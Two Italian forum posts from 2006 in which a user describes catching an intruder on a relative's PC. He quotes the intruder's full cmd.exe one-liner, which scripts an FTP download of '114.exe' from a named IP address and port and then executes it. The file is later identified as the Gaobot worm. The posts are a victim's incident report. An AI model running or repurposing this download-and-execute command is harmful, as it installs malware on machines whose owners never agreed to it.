Messaggio del 22-11-2006 alle ore 06:57:03
Individuato il contenuto del file sospetto 114.exe tramile l'impareggiabile pandasoftware...contiene il worm Gaobot.ONO:
It spreads and affects other computers. It captures certain information entered or saved by the user, with the corresponding threat to privacy. It uses the infected computer to take malicious actions on other users. It carries out actions that decrease the security level of the computer. It downloads files from several websites. It spreads by exploiting vulnerabilities, across the Internet, via IRC, via mapped drives, through shared network resources.
Messaggio del 16-11-2006 alle ore 15:19:11
La scorsa settimana stavo riparando il pc a mia suocera a lucca in connessione remota dagli USA (via messenger) perche' norton aveva segnalato un trojan nel pc...ad un certo punto vedo apparire una shell di dos con comandi insoliti e l'ho chiusa immediatamente...poi ho scovato che sul pc era installato vnc (e pensavo che l'avesse installato un'altro tecnico)...insomma per farla breve questa e' la stringa che era stata lanciata in remoto:
cmd.exe /c del i&echo open 80.248.72.215 32320 > i&echo user 1 1 >> i &echo get 114.exe >> i &echo quit >> i &ftp -n -s:i &114.exe&del i&exit
Ho fatto una veloce ricerca sull'ip sopramenzionato ed appartiene ad un provider africano...quindi sto' topo e' africano, oppure usava quell'ip in remoto lui stesso...
Questo gentiluomo stava uploadando sul pc un'applicazione chiamata 114.exe che ho avuto premura di mandare a me stesso via email...credo che sia incompleto perche' l'ho stroncato a meta'...
mi piacerebbe disassemblarlo, se posso, e vederne il codice, qualcuno conosce una buona applicazione?
saluti,
Marco
PS:
ho detto a mia suocera, niente carte di credito e niente operazioni postali o bancarie sul pc...anche dopo che ho pulito il pc...norton ha funzionato xke' se mi segnala qualcosa vuol dire che lo intercetta...il problema e' quando c'e' un'infezione e non ti dice niente...comunque resto dell'idea che non vale la spesa
semmai hai beccato un pirla 
